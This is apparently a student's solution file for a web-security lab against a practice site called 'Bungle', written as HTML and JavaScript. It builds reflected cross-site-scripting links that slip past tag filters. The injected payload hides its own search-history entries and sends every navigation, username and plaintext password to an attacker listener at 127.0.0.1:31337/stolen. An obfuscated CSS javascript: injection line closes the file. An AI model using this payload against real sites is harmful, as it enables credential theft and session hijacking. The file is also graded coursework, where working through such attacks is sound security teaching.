<meta charset="utf-8">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script>
// Extend this function:
function payload(attacker) {
	// Token for filter defc72a96803a619a6735cd7e7e69e1b
	function log(attacker, data) {
		console.log($.param(data));
		$.get(attacker, data);
	}
	function proxy(attacker, href, ifPushState) {
		$("html").load(href, function(){
			var user = $("#logged-in-user");
			var username = user.text();

			$("html").show();

			if (username == "") {
				log(attacker, {event: "nav", uri: href});
			} else {
				log(attacker, {event: "nav", user: username, uri: href});
			}

			filterSearch();
			handleClick();
			if (ifPushState) {
				history.pushState(href, document.title, href);
			}
		});
	}

	/*
		Modify clicking behavior for each link
	 */
	function handleClick() {
		$("#search-btn").click(onSearch);
		$("#search-again-btn").click(onSearchAgain);
		$("#log-in-btn").click(onLogin);
		$("#new-account-btn").click(onCreate);
		$("#log-out-btn").click(onLogout);
		$("#bungle-lnk").click(onSearchAgain);
	}

	/*
		Filter out attacking history
	 */
	function filterSearch() {
		var historyList = $("#history-list a");
		if (historyList.length == 0) {
			return;
		}
		for (var i = 0; i < historyList.length; i++) {
			if (historyList[i].text.indexOf("defc72a96803a619a6735cd7e7e69e1b") != -1) {
				historyList[i].style.display = "none";
			} else {
				historyList[i].addEventListener("click", onSearchHistory)
			}
		}
	}

	function onSearch(event) {
		var query = $("#query").val();
		var url = "./search?q=" + query;
		proxy(attacker, url, true);
		event.preventDefault();
	}

	function onSearchAgain(event) {
		proxy(attacker, "./", true);
		event.preventDefault();
	}

	function onSearchHistory(event) {
		proxy(attacker, event.target.href, true);
		event.preventDefault();
	}

	function onLogin(event) {
		loginHelper("./login");
		event.preventDefault();
	}

	function onCreate(event) {
		loginHelper("./create");
		event.preventDefault();
	}

	function loginHelper(action) {
		var username = $("#username").val();
		var password = $("#userpass").val();
		var data = {"username": username, "password": password};

		log(attacker, {event: "login", user: username, pass: password});
		$.post(action, data, function() {
			proxy(attacker, "./", true);
		})
	}

	function onLogout(event) {
		var user = $("#logged-in-user");
		var username = user.text();
		log(attacker, {event: "logout", user: username});
		$.post("./logout", function() {
			proxy(attacker, "./", true);
		});
		event.preventDefault();
	}

	/*
		Initialize the attacking script
	 */
	function bootstrap() {
		var url = "./";
		$("html").hide();
		proxy(attacker, url, false);
		history.replaceState(url, document.title, url);
	}

	/*
		Handle the case user clicks on back and forward button
	 */
	window.onpopstate = function(event) {
  		proxy(attacker, event.state, false);
	};

	bootstrap();
}
function makeLink(xssdefense, target, attacker) {
	if (xssdefense == 0) {
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
		encodeURIComponent("<script" + ">" + payload.toString() +
			";payload(\"" + attacker + "\");</script" + ">");
	} else if (xssdefense == 1) {
		var scriptTag = ["s", "c", "r", "i", "p", "t"].join("script");	
		return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
		encodeURIComponent("<" + scriptTag + ">" + payload.toString() +
			";payload(\"" + attacker + "\");</" + scriptTag + ">");
	}
}
var xssdefense = 1;
var target = "http://permalink.co:8080/";
var attacker = "http://127.0.0.1:31337/stolen";
$(function() {
	var url = makeLink(xssdefense, target, attacker);
	$("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
});
</script>
<h3></h3>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>